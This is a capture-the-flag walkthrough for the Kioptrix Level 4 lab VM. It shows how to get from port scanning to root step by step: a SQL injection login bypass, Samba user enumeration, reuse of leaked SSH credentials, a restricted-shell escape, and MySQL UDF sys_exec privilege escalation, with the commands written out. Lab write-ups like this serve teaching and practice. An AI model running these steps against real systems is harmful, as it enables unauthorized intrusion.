Kioptrix: Level 4

This is my writeup for the Kioptrix Level 4 VM from vulnhub.com. It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering

When scanning the host with nmap we find four open ports

  • 22: OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80: Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  • 139: netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  • 445: netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Web

If we check the IP on port 80, we can see a login interface.
From my experience playing CTFs, the first thing I try is, bypass the Login by ' or '1'='1.

login

This worked and we can see an error.

logged_in

You can send any string with username

something
a_dot

So if we can guess an existing username, maybe we'll get some more information. Keep that in mind.

Samba

Let's check what samba's got for us.

$ enum4linux -a 192.168.20.148
  • nobody
  • robert
  • root
  • john
  • loneferret

Shares

Share Comment
print$ Printer Drivers
IPC$ IPC Service

Exploitation

Web

From enum4linux we know that there are 4 users on the system. This allows us now to go further with our finding from above. Let's try the found users.

robert

john

We actually can see user credentials.

SSH

A known security problem is reuse passwords. In this case robert and john did this.
If we try to login with robert and ADGAdsafdfwt4gadfga== we get:

Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

This means we are on the system but in a limited shell which allows us to use:

  • cd
  • clear
  • echo
  • exit
  • help
  • ll
  • lpath
  • ls

Let's try a simple, well known attempt to escape that jailshell.

$ echo os.system('/bin/bash')

Now we have a wider variety of available commands.

If we take a quick look into the webroot (/var/www/), we can identify the inital problem, why ' or '1'='1 worked as a password.

$ cat /var/www/checklogin.php
...
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
...
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
...

It's clear that this code allows us to do exactly what we guessed - bypass the login check.
The reason why many hacker, pentester, security experts or how ever you wanna call them try ' or '1'='1 and actually have success is: A lot of developers have exactly this problem in their code. Unsanitized user input in sql queries.
For details see SQL Injections.

The next bad thing is not far away. At the beginning of the file, mysql credentials are defined and that's what they look like:

$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

So the root user for mysql has no password. That's an absolute no-go.

MySQL

We know the password for the root user. It's none.

$ mysql -u root
$ use members;
$ mysql> select * from members;
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
|  1 | john     | MyNameIsJohn          | 
|  2 | robert   | ADGAdsafdfwt4gadfga== | 
+----+----------+-----------------------+

Nothing new here. We got that information already by bypassing the login check.
Now we try to get root by using UDF. Let's add robert to the admin group:

mysql> select sys_exec('usermod -a -G admin robert');
+----------------------------------------+
| sys_exec('usermod -a -G admin robert') |
+----------------------------------------+
| NULL                                   |
+----------------------------------------+
1 row in set (0.04 sec)

Change to root

robert@Kioptrix4:~$ sudo su
[sudo] password for robert:
root@Kioptrix4:/home/robert# whoami
root

and read the flag

congrats